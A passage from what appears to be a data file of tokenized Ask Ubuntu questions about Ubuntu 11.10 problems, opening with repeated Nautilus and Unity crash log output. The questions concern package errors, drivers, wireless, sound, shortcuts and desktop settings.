glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:6042 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed ( nautilus:6042 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed segmentation fault restarting nautilus and unity in terminal , then crash at end : pst007x @ pst007x-ubuntu64 : ~ $ nautilus -q initializing nautilus-dropbox 0.6.8 initializing nautilus-ideviceinfo extension initializing nautilus-open-terminal extension ** ( nautilus:5621 ) : debug : syncdaemon not running , waiting for it to start in nameownerchanged initializing nautilus-gdu extension ( nautilus:5621 ) : gtk-critical ** : gtk_action_set_visible : assertion `gtk_is_action ( action ) ' failed ( nautilus:5621 ) : gtk-critical ** : gtk_action_set_visible : assertion `gtk_is_action ( action ) ' failed -- - hash table keys for warning below : -- > paolino turone -- > pst007x -- > l2049 -- > inode/directory ( nautilus:5621 ) : eel-warning ** : `` unique eel_ref_str '' hash table still has 4 elements at quit time ( keys above ) -- - hash table keys for warning below : -- > file : ///home/pst007x/desktop -- > x-nautilus-desktop : /// -- > file : ///home/pst007x ( nautilus:5621 ) : eel-warning ** : `` nautilus-directory.c : directories '' hash table still has 3 elements at quit time ( keys above ) shutting down nautilus-gdu extension shutting down nautilus-open-terminal extension shutting down nautilus-ideviceinfo extension pst007x @ pst007x-ubuntu64 : ~ $ unity checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing place options ... done initializing grid options ... done initializing move options ... done initializing mousepoll options ... done initializing resize options ... done initializing snap options ... done initializing gnomecompat options ... done initializing wall options ... done initializing animation options ... done initializing fade options ... done initializing session options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing scale options ... done initializing workarounds options ... done initializing unitymtgrabhandles options ... done initializing ezoom options ... done screen geometry changed : 0x0x1366x768 initializing unityshell options ... done debug 2011-10-15 19:20:19 glib < unknown > :0 setting to primary screen rect : x=0 y=0 w=1366 h=768 warn 2011-10-15 19:20:19 glib < unknown > :0 failed to fetch view type at /org/ayatana/bamf/window31457286 : method `` viewtype '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist warn 2011-10-15 19:20:19 glib < unknown > :0 failed to fetch view type at /org/ayatana/bamf/application0x11b6340 : method `` viewtype '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist warn 2011-10-15 19:20:19 glib < unknown > :0 failed to fetch view type at /org/ayatana/bamf/application0x11b6340 : method `` viewtype '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist compiz ( core ) - warn : unhandled configurenotify on 0x3e00180 ! compiz ( core ) - warn : this should never happen . you shouldprobably file a bug about this . setting update `` main_menu_key '' setting update `` run_key '' setting update `` flip_left_edge '' setting update `` launcher_reveal_edge '' setting update `` launcher_hide_mode '' warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/applications does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/applications does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/music does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/music does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/files does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/files does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method inforequest proxy /com/canonical/unity/lens/commands does not exist warn 2011-10-15 19:20:29 unity.glib.dbusproxy glibdbusproxy.cpp:255 can not call method setactive proxy /com/canonical/unity/lens/commands does not exist warn 2011-10-15 19:20:30 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-installed.svg : error opening file : no such file or directory warn 2011-10-15 19:20:30 unity.iconloader iconloader.cpp:509 unable to load contents of file : ///usr/share/icons/unity-icon-theme/places/svg/category-available.svg : error opening file : no such file or directory warn 2011-10-15 19:20:35 glib < unknown > :0 unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist warn 2011-10-15 19:20:35 glib.glib-gobject < unknown > :0 instance of invalid non-instantiatable type ` < invalid > '
66995	libvte-common package breaks package manager	updated to 11.10 , but i get a message error : brokencount > 0 the following packages have unmet dependencies : libvte-common : when i go to the software centre i ca n't add , remove or update , it tells me to run the following command in a terminal : apt-get install -f which gets me nowhere as i do n't know what to do next . also message that the package catalog needs to be repaired but it fails when i press the repair bar . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 263371 files and directories currently installed . ) preparing to replace libvte9 1:0.27.90-0ubuntu1 ( using ... /libvte9_1 % 3a0.28.2-0ubuntu2_i386.deb ) ... unpacking replacement libvte9 ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:0 > : data error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libvte9_1 % 3a0.28.2-0ubuntu2_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/libvte9_1 % 3a0.28.2-0ubuntu2_i386.deb error in function : any help please ? ( please spell it out as basically as possible ! )
66997	madwifi driver installation error : `` can not detect kernel version ''	i can not get past this error when trying to run `` make '' on the driver source . makefile.inc:81 : *** can not detect kernel version - please check compiler and kernelpath . stop . does anyone know the procedure for installing madwifi drivers on ubuntu 11.10 ? notes : i have all the necessary packages installed including the linux headers and have also tried specifying the `` kernelpath '' manually .
67000	how can i change prtscn to capture by area ?	i just installed 11.10 . one of the standard things i do on a new install of ubuntu is change the action taken when i hit the prtscn key . by default the action is to take a screenshot . i change it so that it takes a screenshot by area . here 's how i do that in earlier versions : system > preferences > keyboard shortcuts add name : take area screenshot shortcut : gnome-screenshot -a then click printscreen . it will ask you to disable the normal screenshot . say yes . here 's what i tried in 11.10 settings > keyboard > shortcuts go under custom shortcut add name : take area screenshot shortcut : gnome-screenshot -a all seems good so far . i see a new row that shows disabled . that makes sense to me because i have n't yet assigned a key to it . but here 's where i get hung up . if i click the prtscn it actually takes a screenshot . if i hold prtscn down for 3 seconds , my computer gets bogged down and when it finally recovers i have to cancel over 20 screenshots that it has taken . so i figured the problem is that i first need to disable the default screenshot shortcut . so i went there and click backspace , but no go . any suggestions ?
67001	what commands are needed to install ubuntu core ?	ubuntu core 's wiki page page contains the instructions to install ubuntu core on a target media : uncompress ( do not unpack ) rootfs format target media : at least one partition should be ext2 , ext3 , or ext4 unpack ubuntu core to ext { 2,3,4 } partition install boot-loader install linux if the linux kernel requires modules , add these to /lib/modules/ $ ( uname -r ) in the ext { 2,3,4 } file system boot the target device install any additional required software using apt-get but what are the specific commands to do the above ? the things i 'm specifically confused about are : uncompressing and unpacking , what 's the difference and how do i do them ? what package should i install if i want the generic kernel provided in regular ubuntu installation ? i wo n't be installing any drivers or anything related to kernel other than what 's provided in the repos , do i need to worry about manually adding kernel modules ? ps i would like to request that all the commands used in the installation process be mentioned in the answer , for the benefit of ones who 're completely unfamiliar and myself , should i ever forget .
67002	command in rc.local doesnt work with gnome-shell	i want to run this command at startup : echo off > /sys/kernel/debug/vgaswitcheroo/switch it turns off my second gpu . i added it to rc.local but it does n't work . can someone help ? thanks in advance !
67003	where do i file bugs for jupiter applet ?	i 've downloaded the juputer power management tool via ppa , and i want to file a bug for it regarding its integration with the unity-panel . where do i file this ? there does n't appear to be a page under www.bugs.launchpad.net/ubuntu/+source/jupiter .
67006	desktop sharing not working when upgrading from 11.04 to 11.10	just upgraded ( reinstalled , because upgrading messed up my whole system ) from 11.04 to 11.10 and desktop sharing simply does n't work anymore . under the desktop sharing preferences i enabled the following options : allow other users to view your desktop allow other users to control your desktop require the user to enter this password ( and set up one ) show notification area icon : always i set up the notification area icon to always show after i 'd noticed my pc was n't accepting vnc connections on port 5900 . after setting up the preferences like described above , imho the expected behavior would be a desktop sharing icon showing up next to the clock . the icon does not show and pc still not responding to vnc connections . any guidance appreciated . thiago
67008	how to suspend my laptop when i close the lid ?	since i installed 11.10 the system does not suspend when i close the lid . in power management , the values for both battery and plug are set to suspend . when i just click on suspend , it works fine .
67009	how to `` roll up '' the window ?	after just having upgraded to 11.10 , i wonder how i can change what happens when i double click a window title bar . i had it configured to roll up ( i can not remember the phrase in english , in german it was `` einrollen '' , i guess ) which was found in the appearence menu as far as a i remember . the solution proposed at what happened to `` roll up '' option in preferences/window/title bar action ? doesnt work for me insofar as toggle-shade minimizes the window with a roll-up animation , and shade alone will maximize the window after rolling it up . anyone have a clue what i can do ?
67018	full text file search in unity	i have recently installed ubuntu 11.10 and i can not figure out how to achieve the full text search using the file search lens . i am aware zeitgeist indexes only files i have opened already , so i deliberately open a file ( odt , odp , whatever ) , close it , and then go to the lens and type in some of the words from the file . surely nothing shows up , ever . so i wonder , is there something else i have to do in order to enable full text search ( fts extension is installed ) or is there some timing used by zeitgeist to index files ? i used tracker for this purpose ( even though it searched all files , not only the opened ones ) in older ubuntu versions .
67021	how do i disable startup sound in 11.10 ?	there is no option to disable this sound ( the one after you log in , when entering gnome ) , and it is not present anymore in the program startup list like it was in 11.04 ...
67024	can not setup synchronising tomboy with ubuntu one	my web browser opened , and i logged in . i get the message `` tomboy web authorisation successful - please return to the tomboy preferences window and press save to start synchronising '' . so i returned to tomboy to find the window below . as you can see , it asks me to press save , but the save button is greyed out !
67026	bluetooth permission denied ( 13 ) error	after upgrade to oneiric ocelot , my bluetooth is broken . it can recognize the device ( my phone ) and `` pair '' with it ( exchange passcodes ) but when i try to send files to my phone it fails with `` permission denied ( 13 ) '' error.i did n't have this problem in 11.04 . any help appreciated . also , send files works perfectly in the other direction [ phone -to- pc is ok , but pc -to- phone fails ]
67029	alternatives to sunbird ?	i have an ical file on my webserver , shared via webdav ... since sunbird is n't supported anymore , what are the alternatives , aside from thunderbird+lightning ( which i 'd like to avoid , since i use another mail program ) ?
67032	ca n't enable gnome shell user theme extension	just installed 11.10 and gnome tweak tool but ca n't install gnome-shell-extensions-user-theme due to it not existing ( or so apt-get install tells me ) . because of that , there is no enabling user-theme-extensions in the advanced settings for the gnome tweak tool . i ca n't find the repository for it anywhere . what am i doing wrong ?
67033	how can i add a line parameter like -opengl on world of warcraft in playonlinux ?	i would like to add the -opengl parameter to a file which is in /home/.playonlinux/wineprefix/worldofwarcraft/drive_c/program files/world of warcraft/wow.exe
67036	tried switching to kde , but certain things look wrong	i wanted to try kde , so i logged out , changed to kubuntu , and logged in . things are mostly fine , but a handful of things look off . for example , in firefox , theres a very rigid box surrounding the menu bar that does n't match up with the default kde theme . are things supposed to look like that , or is there something wrong ( and how do i fix it ? )
67037	wifi adapter not working on an acer 5755g	i own an acer5755g laptop computer . i 've successfully installed ubuntu 11.10 but the wifi hardware is not detected by the system . please help me as this is a big problem for me and being a cse student i need working internet connection while in the university . thank you .
67040	using terminal i want to copy some files	assuming i 'm not in my home directory , i want to copy all the files starting with `` a '' from my home directory to my current directory . i 've tried cp ~ a* . and different variations of that but it has n't worked at all . thank you . edit : *thank you again
67044	change default user folders path ?	in previous releases of ubuntu , i used ubuntu tweak to change the paths to the user folders ( music , documents , videos , etc ) . i ca n't find an option in gnome 3 to do this , and ubuntu tweak 's ppa still has no version for oneiric .
67047	how to uninstall google chrome ?	i decided to try out google chrome and see if it was any different from chromium , but now i ca n't figure out how to uninstall it . that 's what i have installed . how to get rid of it is the question .
67051	filetype icon not being displayed when downloading something in chrome	whenever i download something in chrome , the little icon in the center of the download that shows the file type icon , around which there 's the download progress bar , is n't displayed . if that sounds confusing , take a look at this screenshot :
67054	remove entries from messaging menu	in ubuntu 11.10 , how do i remove the chat , broadcast and set up mail ... entries from the messaging menu ? i tried blacklisting them by symlinking ( say , ~/.config/indicators/messages/applications-blacklist/empathy to /usr/share/indicators/messages/applications/empathy ) but that did n't do anything ... has the blacklisting method changed ? do i have to use other application names ?
67055	slow/laggy desktop effects with nvidia card	i 've installed oneiric from scratch ( did n't upgrade ) , and i 'm having troubles with desktop effects : unity is very slow - whenever i click on the workspaces icon , i either get no animation , or the animation just hangs for a second or so before it 's completed . other behaviors feel similarly unresponsive . for example , whenever i try to move a window on the desktop , it will lag behind for a while before it catches up with the mouse pointer . gnome shell feels slightly better , but not by much . the cpu is an amd athlon ii x2 , i have 4 gb ram , and the video card is is an nvidia geforce 6150se nforce 430 . i 've tried playing around with nvidia-settings ; i 've installed/removed every single nvidia driver in the repositories ( currently using nvidia-173 ) ; i 've changed the compiz settings following solutions for similar issues ( unchecked `` detect refresh rate '' , and so on ) , without any success - in fact , i did n't even manage to make things worse . ; ) glxgears looks great , and it feels like the driver is working really well for everything except desktop effects . unity 2d is fine , and i 'm using it right now .
67058	sound from both speakers and headphones . bug with soundcard ?	i just wanted to listen some music on my notebook ( ubuntu 11.10 ) , so i connected headphones , and started banshee . but later noticed the sound really came out of my headphones and my speakers . i tried to fix it with audio options , but i could n't way and it is n't a banshee bug . i 'm using a medion md 96630 , here 's a chart with its stats and it has a hda-intel-chip with realtek alc888 codec thanks to anyone who can answer me this , and please give me a detailed tutorial how to fix this .
67063	why is the nvidia gpu so hot ?	i have just installed 11.10 and installed the recommended driver for nvidia ( 230m ) . the current driver installed is 280.13 . the temperature of the card is 85째c . i have tried using lxde and unity 2d , but the temperature does not drop . once it did drop to 76째c , but even that 's quite a lot . is there a fix to this ? do you think downgrading my driver would help ? if so , how should i go about it ?
67064	unable to connect to wired dhcp connection via my pc ?	hi as i upgrade my pc to ubuntu 11.10 i ca n't connect to the wired connection ! it does n't even find my device mac address ! ! what can i do ? ifconfig -a eth0 link encap : ethernet hwaddr ff : ff : ff : ff : ff : ff broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:44 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:6647 errors:0 dropped:0 overruns:0 frame:0 tx packets:6647 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1333687 ( 1.3 mb ) tx bytes:1333687 ( 1.3 mb ) the answer of etc/network/interfaces auto lo iface lo inet loopback sudo lshw -class network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 02 serial : ff : ff : ff : ff : ff : ff size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a latency=0 link=no multicast=yes port=mii speed=1gbit/s resources : irq:44 ioport : c000 ( size=256 ) memory : cff20000-cff20fff memory : cff00000-cff0ffff memory : cff10000-cff1ffff lspci 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 4 00:1a.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 5 00:1a.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 6 00:1a.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 2 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller 00:1c.0 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 1 00:1c.4 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 5 00:1c.5 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 6 00:1d.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 1 00:1d.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 2 00:1d.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 3 00:1d.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 1 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 90 ) 00:1f.0 isa bridge : intel corporation 82801jib ( ich10 ) lpc interface controller 00:1f.2 ide interface : intel corporation 82801ji ( ich10 family ) 4 port sata ide controller # 1 00:1f.3 smbus : intel corporation 82801ji ( ich10 family ) smbus controller 00:1f.5 ide interface : intel corporation 82801ji ( ich10 family ) 2 port sata ide controller # 2 01:00.0 vga compatible controller : nvidia corporation g92 [ geforce 9600 gso ] ( rev a2 ) 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) 05:00.0 memory controller : conexant systems , inc. device 2d00 ( rev 01 ) uname -a linux mahdiar-ep45-ud3l 3.0.0-15-generic # 26-ubuntu smp fri jan 20 17:23:00 utc 2012 x86_64 x86_64 x86_64 gnu/linux
67065	system does n't boot after amd 11.9 driver install	im having a bit of a problem with ubuntu . i just installed amd 11.9 driver from the amd website . now the boot is stuck at this image . how do i resolve the issue without reinstalling ubuntu ? the computer is running ubuntu 11.10 64bit with an a6-3400m cpu and a 6520g radeon card . thanks in advance .
67073	sweex 7.1 external usb sound card	i have just bought the above sound card and it is recognised within ubuntu 11.10 and produces sound using the spdif output to my surround reciever . the problem is that i can not get it to output anything more than stereo over the spdif . in sound settings i can not set anything other than digital stereo ( iec958 ) output . the chipset is cm6206 but is recognised as a `` cm106 like '' card . how do i get 5.1 digital surround sound to work ? since this is the output for my media centre in the lounge its important that the surround sound works . any help greatly appreciated . thanks alex
67076	ubuntu feels slow after 11.10 update	i recently updated ubuntu to the latest 11.10 version . for some reason since the update ubuntu reacts slowly . for example , when i drag a window there is a delay in the movement , when i write text it takes time for it to appear and more . however , when i use gnome shell instead of unity when i log in , the computer is as snappy as usual .
67084	how to play ape ( monkey 's audio ) files ?	how can i play ape ( monkey 's audio ) files in ubuntu 11.10 ? thanks in advance ! solution : i finally installed ffmpeg as duffydack suggested , using the instructions from here : http : //ubuntuforums.org/showthread.php ? t=786095 then i converted the ape file to flac format : ffmpeg -i inputaudio.ape outputaudio.flac
67085	slow shut down on a dell inspiron 15r	i have a notebook dell inspiron 15r ( core i3 , 6gb and intel graphics card ) , had ubuntu 11.04 installed and have just upgraded to 11.10 . everything looks about the same except for shutdown which is extremely slow , even worse than my windows 7 ( what i consider an insult ) . is version 11.10 shutdown really that slow ? thanks .
67087	where is the .wine folder ?	in 11.04 the wine folder was located in /home/ '' username '' /.wine but now that i 've done a fresh install of 11.10 and reinstalled wine , the folder is nowhere to be found . there is a .wine text file in my home folder , but no .wine folder . i installed an exe and got no errors , but i just ca n't find the wine folder with the program files .
67091	ccsm changes have no effect	after upgrading to oneiric i want to tweak some unity settings , but changing anything with compizconfig settings manager has no effect . i tried to relogin or reboot but it did n't help . in natty i used only gnome ( unity did n't started because of a driver issue ) . also , when i first started ccsm , ubuntu unity plugin was not enabled , which seemed strange to me . i enabled it , resolving some conflicts to make sure that each setting is enabled for unity and not the conflicting plugin .
67094	how do i make nautilus reload emblems when changed by a script ?	i am writing a script to manage my downloads folder . it will automatically delete items older than a month ( or any other period of time ) , unless the item is `` starred '' . i used nautilus-actions to add a context ( right-click ) menu item that allows you to star items in the downloads folder in nautilus . it adds a star ( `` favorite '' ) emblem to the item . however the star does n't show up until i run nautilus -q and reopen the downloads folder in nautilus . is there a way to get nautilus to refresh and show the new emblem without having to quit nautilus ?
67095	amazon s3 option missing in deja dup ?	i wanted to restore my backup ( created with deja dup on fedora 15 ) from amazon s3 , but the option to set up amazon as storage location in ubuntu 's deja dup seems to be missing . i only have ubuntu one , ssh , ftp , webdav , win share , local folder and custom location . am i missing some package ( s ) , is it some bug , or maybe i 'm just doing something wrong ? uncle google refuses to help ... : (
67096	how do i associate the correct icon for my login ?	after upgrading to 11.10 from 11.04 , the unity launcher shows a question mark icon for libreoffice-calc . if i log in using unity2d or log into the guest account ( 2d or 3d ) , the correct icon appears . how do i associate the correct icon for my login ?
67097	wireless no longer works after upgrade to 11.10 on dell xps l702x	i have a dell xps l702x laptop and after upgrading from 11.04 to 11.10 , my wireless no longer works . i 'm using a ethernet cable to get online to ask this question . > iwconfig lo no wireless extensions . eth0 no wireless extensions . > lspci -v ... 3:00.0 network controller : intel corporation centrino wireless-n 1000 subsystem : intel corporation centrino wireless-n 1000 bgn flags : bus master , fast devsel , latency 0 , irq 6 memory at d7400000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 8c-a9-82-ff-ff-89-12-c6 kernel modules : iwlagn ... anyone know a fix ? ( yes , i have tried fn+f2 , to switch on wireless ) .
67099	workspace switcher does n't work from the launcher	i just upgraded from 11.04 to 11.10 and everything seems to be running smoothly except for one thing : i ca n't seem to get the workspace switcher to work . when i press the launcher icon , my desktop flickers and fades into black , but does n't do anything else until i press the icon again and everything comes back . any idea what might be going on ? it was working fine in 11.04 .
67101	how can i see more battery info when using gnome shell ?	i 've been using gnome shell on ubuntu 11.10 and i 've been fairly satisfied . one thing that i really wish was different though is the battery icon . i ca n't tell by glancing at it what my battery status is at all ! is there are way to add the battery charge percent or the estimated battery time to the icon ?
67102	launcher gone after customizing it	i did the upgrade on my laptop . great ! . getting familiar with it and loving it ! . ( i switched to ubuntu a month ago and never looked back : ) upgrade it my desktop , not so great ! and i have no clue how to fix it ! i was setting the launcher preferences like my laptop , changed the size of icons , auto hide format , launcher hid really well cause i ca n't find it anywhere ! ! even the top r corner menu portion is gone off the top tool bar ? ? i can only see 'file edit go bookmarks help ' in top left & my background , nothing else : / how can i fix this ? ?
67109	recovering a lost file system off a hard drive ?	i was repartioning my hard drive , and i was in the process of moving a partition left and resizing it , when i accidentally hit the `` cancel '' button . while the partition itself was already resized , the moving of the file system itself had not begun moving ( it was in a 'read-only ' phase of the process at the time ) , and so i am still hopeful that it is still possible to recover the file system , and that everything should be intact . however , it is inaccessible by any means i can think of , and located somewhere in the middle of the new partition , though i do n't know exactly where . is there any tools i could use to find the location of the file system or recover it or really , just anything to get access to my files there ? any help is appreciated .
67113	no sound on hdmi with radeon driver	my pc has a build-in vt1828s chip . the connection between pc and monitor ( which has built-in speakers ) is through an hdmi cable . audio preferences shows 2 devices for audio output : analog stereo and rs880 audio device [ radeon hd 4200 ] digital stereo ( hdmi ) . when i plug a headphone in the rear jack and i choose the former device , everything works . when i choose the latter device , instead , no sound is heard , and video playback is too fast . it is as if video frames want to synchronise with the audio timing , but the audio timing information is wrong . hdmi audio worked perfectly with ubuntu 11.04 , but stopped after 11.10 upgrade .
